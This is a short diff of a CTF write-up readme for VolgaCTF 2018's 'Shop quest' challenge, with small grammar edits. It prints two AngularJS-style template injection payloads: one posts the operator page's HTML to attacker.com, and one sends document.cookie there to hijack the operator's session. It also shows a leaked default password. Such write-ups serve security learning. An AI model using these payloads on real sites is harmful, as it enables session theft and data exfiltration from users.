shvetsovalex/ctf/2018/VolgaCTF-quals/Shop quest/readme.md

 ```
 ${toString.constructor('var http=new XMLHttpRequest();http.open("POST","http://attacker.com/?bot", true);http.setRequestHeader("Content-type","application/x-www-form-urlencoded");http.send("res="+btoa(unescape(encodeURIComponent(document.body.innerHTML))));')()}
 ```
-On *attacker.com* we can see the page where the operator is located reads our message.
+On *attacker.com* we can see the page where the operator is located reading our message.
 Decode this page and find operator's password:

 *Change your default password: Floise_default_@@@f*

 But, you can ask: "Where can I find the login?
 Login "Operator" doesn't work!"
 Ok) We can see non http only cookie - *userId*.
 This is IDOR.
-We can steal operator's cookie and make request on the server with it.
+We can steal operator's cookie and make request to the server with it.

 ```${toString.constructor('document.location = "http://attacker.com/?"+document.cookie')()}```